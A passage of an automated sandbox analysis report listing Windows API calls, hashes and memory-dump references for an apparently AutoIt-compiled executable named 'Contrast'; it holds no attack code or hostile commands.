                                                                                                                                        • Opcode Fuzzy Hash: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                                                                                                                                        • Instruction Fuzzy Hash: 8311AC32611604EFDF109FA4CC49BBE7BADFF56326F108118E84597250CB36A945EB60
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00569200
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00569207
                                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00569216
                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00569221
                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00569250
                                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00569264
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1413079979-0
                                                                                                                                        • Opcode ID: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                                                                                                                                        • Instruction ID: 92e245a384eb8d0d115b9769a7fb48fac50afaed69156054d955fae3546c533d
                                                                                                                                        • Opcode Fuzzy Hash: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                                                                                                                                        • Instruction Fuzzy Hash: 4511447650124AABDF018FA4ED49BDA7BADFF4A304F144025FA04A21A0C2769E64EB60
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0056C34E
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0056C35F
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056C366
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0056C36E
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056C385
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0056C397
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                        • Opcode ID: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                                                                                                                                        • Instruction ID: 8db2c99e66d5acf14f6eb787a1db3745cc2b3c14e749d1d64c5e7b812ba6a70a
                                                                                                                                        • Opcode Fuzzy Hash: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                                                                                                                                        • Instruction Fuzzy Hash: 02014F75E00219BBEF109BA69C49A5EBFB8EB59761F004065FA08AB280D6709D14DFA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                          • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0059C57C
                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0059C590
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C59E
                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0059C5AE
                                                                                                                                        • EndPath.GDI32(00000000), ref: 0059C5BE
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 0059C5CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                        • Opcode ID: c0109932dd8cf65d155296b39a3969ac193981a875439aa15c8bca36b2ab7c35
                                                                                                                                        • Instruction ID: 98c28dce9f7e9d6fe8461ba959234bd470f2e89d52cca927a12cefc3563792a8
                                                                                                                                        • Opcode Fuzzy Hash: c0109932dd8cf65d155296b39a3969ac193981a875439aa15c8bca36b2ab7c35
                                                                                                                                        • Instruction Fuzzy Hash: DA11DE7600010DBFDF129F90DC48FDA7FADFB19354F048452BA19561A0D771AE59EBA0
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005307EC
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 005307F4
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005307FF
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0053080A
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00530812
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0053081A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        • Opcode ID: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                                                                                                                                        • Instruction ID: 94e71dc39052b244d4387e6a4cf6fb4ed17ad669a2babd4563eee39437067e52
                                                                                                                                        • Opcode Fuzzy Hash: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                                                                                                                                        • Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005759B4
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005759CA
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 005759D9
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759E8
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                        • Opcode ID: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                                                                                                                                        • Instruction ID: 5f60b31b419543013275331e56ab571898e68dc62c8df64888f90af4cb96fb3e
                                                                                                                                        • Opcode Fuzzy Hash: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                                                                                                                                        • Instruction Fuzzy Hash: CAF01D32251158BFE7215B929C0DEEF7A7CEBD7B15F000159FA0592090E7A01A16E6B5
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 005777FE
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 0057780F
                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,0051C2B6,?,?), ref: 0057781C
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0051C2B6,?,?), ref: 00577829
                                                                                                                                          • Part of subcall function 005771F0: CloseHandle.KERNEL32(00000000,?,00577836,?,0051C2B6,?,?), ref: 005771FA
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0057783C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 00577843
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        • Opcode ID: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                                                                                                                                        • Instruction ID: 67c1d58819b4df9d35bb2b69e926d3c6cc851ce10eee91e47ddd422136151a9a
                                                                                                                                        • Opcode Fuzzy Hash: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                                                                                                                                        • Instruction Fuzzy Hash: 25F05E36155312ABD7112B64FC8CAEB7B29FF5A302F146421F102950E0CBB59809EB61
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00569555
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00569561
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0056956A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00569572
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0056957B
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00569582
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                        • Opcode ID: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                                                                                                                                        • Instruction ID: e5f0069338f8e7d8436b5e557d69dd47a9f5dc99953db70d22223e123934cbdd
                                                                                                                                        • Opcode Fuzzy Hash: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                                                                                                                                        • Instruction Fuzzy Hash: 1BE0E536114101BFDB011FE1EC0C99ABF39FF6A722B105621F215810B0CB72A469EF90
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00588CFD
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00588E0C
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00588F84
                                                                                                                                          • Part of subcall function 00577B1D: VariantInit.OLEAUT32(00000000), ref: 00577B5D
                                                                                                                                          • Part of subcall function 00577B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00577B66
                                                                                                                                          • Part of subcall function 00577B1D: VariantClear.OLEAUT32(00000000), ref: 00577B72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                        • Opcode ID: d46de942f83c17339ddbaa78049e5b4c7caf8d399c4072103da826391a73deab
                                                                                                                                        • Instruction ID: 6726e3ab939969fb9c96783bf72d87b907d0ba00a95911ed15da8312d5d20e36
                                                                                                                                        • Opcode Fuzzy Hash: d46de942f83c17339ddbaa78049e5b4c7caf8d399c4072103da826391a73deab
                                                                                                                                        • Instruction Fuzzy Hash: 53916C746043029FC710EF24C48596ABBE5FFD9314F14896EF88A9B3A1DB31E945CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                        • _memset.LIBCMT ref: 0057332E
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057335D
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00573410
                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057343E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                                        • Opcode ID: d32cd2f78d07f59cc9c3bd8e17a9c7faa3bc8108b21600a5940e9700591cd18f
                                                                                                                                        • Instruction ID: 53b0c2e2e25b8577a73288f49f43e0d9d405943eb5f95ca211b5919239696bf8
                                                                                                                                        • Opcode Fuzzy Hash: d32cd2f78d07f59cc9c3bd8e17a9c7faa3bc8108b21600a5940e9700591cd18f
                                                                                                                                        • Instruction Fuzzy Hash: 3851C2316083119BDB299E28E84966BBFE4BF95330F04892EF899D31D1DB20CE44F756
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00572F67
                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00572F83
                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00572FC9
                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D7890,00000000), ref: 00573012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                        • Opcode ID: 6266eaac2bf3b03c23b2a34b4b8862f9851bc3278328d5a40e8d6b72d8c06b0b
                                                                                                                                        • Instruction ID: db5190bc25f040978ddb9be6d34f42df91c41ddf99ef1fb9dc9ee00f9b2e08dd
                                                                                                                                        • Opcode Fuzzy Hash: 6266eaac2bf3b03c23b2a34b4b8862f9851bc3278328d5a40e8d6b72d8c06b0b
                                                                                                                                        • Instruction Fuzzy Hash: 0441D6712083429FD720DF25E849B1ABFE4BF85320F108A1DF569972D1DB70EA05EB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00569ACC
                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00569ADF
                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00569B0F
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 365058703-1403004172
                                                                                                                                        • Opcode ID: 6a098ad644fe4e7076f74c8f1dbf83d3c5fa842953ee2aef6afc408a7ece0d98
                                                                                                                                        • Instruction ID: e1f1ab84c3d923c5c3599203e4606d8420a239c73d065af24dc29909d484d5fb
                                                                                                                                        • Opcode Fuzzy Hash: 6a098ad644fe4e7076f74c8f1dbf83d3c5fa842953ee2aef6afc408a7ece0d98
                                                                                                                                        • Instruction Fuzzy Hash: E121E171904104AEDB14ABA4EC8ADFFBFACFF92360F144119F825A72E1DB344D099660
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                                                                                                                                          • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                                                                                                                                          • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00596A86
                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00596A8D
                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00596AA2
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00596AAA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                                        • Opcode ID: 0577d1613db7126967c71847b0337e51a0f34de33eabc4bd82d37214c1fbbb4a
                                                                                                                                        • Instruction ID: 5e98e145b6029209219a300b01d73692b9f2ab82d5a7b57d2ac1267b9aa46d2d
                                                                                                                                        • Opcode Fuzzy Hash: 0577d1613db7126967c71847b0337e51a0f34de33eabc4bd82d37214c1fbbb4a
                                                                                                                                        • Instruction Fuzzy Hash: 6A219A71200205EFEF108FB4DC80EBB7BADFB59368F109619FA50A2190D331DC99A760
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00577377
                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005773AA
                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 005773BC
                                                                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005773F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandle$FilePipe
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 4209266947-2873401336
                                                                                                                                        • Opcode ID: 641964a8ad06ab8c4b022b80998538698fe1a24edc73f0ab4948f2659357f537
                                                                                                                                        • Instruction ID: 9c00fb569af4b6b74d8b1f20542c95ff835283d0daaeecdaaed21dce5cc4c401
                                                                                                                                        • Opcode Fuzzy Hash: 641964a8ad06ab8c4b022b80998538698fe1a24edc73f0ab4948f2659357f537
                                                                                                                                        • Instruction Fuzzy Hash: C321607450830A9BDB208F64FC49A9A7FA4BF59720F208E19FCA4D72D0D770D950EB60
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00577444
                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00577476
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00577487
                                                                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005774C1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
